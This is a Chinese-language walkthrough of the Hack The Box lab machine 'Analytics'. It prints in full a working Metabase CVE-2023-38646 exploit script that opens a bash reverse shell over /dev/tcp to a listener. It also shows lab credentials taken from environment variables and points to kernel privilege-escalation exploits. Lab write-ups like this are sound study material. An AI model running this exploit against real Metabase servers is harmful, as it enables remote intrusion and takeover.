Analytics
0x01 信息收集
1、使用nmap进行端口扫描
nmap -p- --min-rate 10000 10.10.11.233
2、发现目标开放了两个端口,对22和80端口进行信息收集
nmap -sC -sV -A -p 22,80 10.10.11.233
3、扫描发现80端口绑定着一个域名analytical.htb,将其添加到hosts文件中并使用浏览器访问
4、对网页进行信息收集发现一个子域名data.analytical.htb
5、目录枚举半天也没有发现什么,子域名爆破也没有爆破出来其它子域名
6、将发现的子域名添加到hosts文件并使用浏览器访问刚才在源码中发现的子域名,发现是一个标题为Metabase的站
0x02 User
1、搜索关键字Metabase发现其是一款开源的分析工具
2、searchsploit搜索没有发现存在的漏洞
3、在浏览器中搜索发现了CVE-2023-38646漏洞
4、本地监听4444端口,使用Github中找到的Poc对目标进行攻击
nc -nvlp 4444
python3 CVE-2023-38646.py --rhost http://data.analytical.htb --lhost 10.10.14.9 --lport 4444
import requests
import argparse
import base64
import json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from urllib.parse import urlparse
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def get_setup_token_and_version(ip_address):
endpoint = "/api/session/properties"
url = f"{ip_address}{endpoint}"
try:
print(f"[DEBUG] Fetching setup token from {url}...")
response = requests.get(url, verify=False)
if response.status_code == 200:
data = response.json()
setup_token = data.get("setup-token")
metabase_version = data.get("version", {}).get("tag")
if setup_token is None:
print(f"[DEBUG] Setup token not found or is null for IP: {ip_address}\n")
else:
print(f"[DEBUG] Setup Token: {setup_token}")
print(f"[DEBUG] Version: {metabase_version}")
return setup_token
except requests.exceptions.RequestException as e:
print(f"[DEBUG] Exception occurred: {e}")
print(f"[DEBUG] Failed to connect to {ip_address}.\n")
def post_setup_validate(ip_address, setup_token, listener_ip, listener_port):
payload = base64.b64encode(f"bash -i >&/dev/tcp/{listener_ip}/{listener_port} 0>&1".encode()).decode()
print(f"[DEBUG] Payload = {payload}")
endpoint = "/api/setup/validate"
url = f"{ip_address}{endpoint}"
headers = {'Content-Type': 'application/json'}
data = {
"token": setup_token,
"details": {
"is_on_demand": False,
"is_full_sync": False,
"is_sample": False,
"cache_ttl": None,
"refingerprint": False,
"auto_run_queries": True,
"schedules": {},
"details": {
"db": f"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {{echo,{payload}}}|{{base64,-d}}|{{bash,-i}}')\n$$--=x",
"advanced-options": False,
"ssl": True
},
"name": "test",
"engine": "h2"
}
}
print(f"[DEBUG] Sending request to {url} with headers {headers} and data {json.dumps(data, indent=4)}")
try:
response = requests.post(url, headers=headers, json=data, verify=False)
print(f"[DEBUG] Response received: {response.text}")
if response.status_code == 200:
print(f"[DEBUG] POST to {url} successful.\n")
else:
print(f"[DEBUG] POST to {url} failed with status code: {response.status_code}\n")
except requests.exceptions.RequestException as e:
print(f"[DEBUG] Exception occurred: {e}")
print(f"[DEBUG] Failed to connect to {url}\n")
def preprocess_url(user_input):
parsed_url = urlparse(user_input)
protocol = f"{parsed_url.scheme}://" if parsed_url.scheme else "http://"
netloc = parsed_url.netloc or parsed_url.path
return protocol + netloc.rstrip('/')
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Check setup token')
parser.add_argument('--rhost', type=str, help='Metabase server IP address (including http:// or https:// and port number if needed)')
parser.add_argument('--lhost', type=str, help='Listener IP address')
parser.add_argument('--lport', type=int, default=4444, help='Listener port (default is 4444)')
args = parser.parse_args()
print(f"[DEBUG] Original rhost: {args.rhost}")
args.rhost = preprocess_url(args.rhost)
print(f"[DEBUG] Preprocessed rhost: {args.rhost}")
print(f"[DEBUG] Input Arguments - rhost: {args.rhost}, lhost: {args.lhost}, lport: {args.lport}")
setup_token = get_setup_token_and_version(args.rhost)
print(f"[DEBUG] Setup token: {setup_token}")
if setup_token:
post_setup_validate(args.rhost, setup_token, args.lhost, args.lport)
5、前往home里查看user的flag发现是空的???
6、继续回到根目录翻目录发现.dockerenv,可能这是个docker
7、尝试使用env命令去查看docker的环境变量,发现了其中存在的登录凭据
META_USER=metalytics
META_PASS=An4lytics_ds20223#
8、使用凭据进行ssh登录后获取到user的flag
ssh metalytics@10.10.11.233
0x03 Root
1、信息收集当前内核版本为22.04
metalytics@analytics:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/umount
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
metalytics@analytics:~$ uname -a
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
metalytics@analytics:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 22.04.3 LTS
Release: 22.04
Codename: jammy
metalytics@analytics:~$
2、查找发现可以使用sh脚本进行提权
https://github.com/OllaPapito/gameoverlay
3、提权成功但是不能访问root目录
metalytics@analytics:~$ cd /tmp
metalytics@analytics:/tmp$ ./yebai.sh
root@analytics:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@analytics:/tmp# cd /root
bash: cd: /root: Permission denied
root@analytics:/tmp#
4、查看大佬wp发现可以使用CVE-2021-3493进行内核提权,当前靶机内核版本是22.04不知道为什么可以使用该漏洞…没有查到资料
https://github.com/briskets/CVE-2021-3493
5、使用python3启一个http服务,将Exploit进行编译后下载到靶机中
6、赋予执行权限进行执行获得root以后发现还是不行
7、只能万能重启大法再来一遍了,成功拿到flag,看来果然是有坏Yin玩坏了机器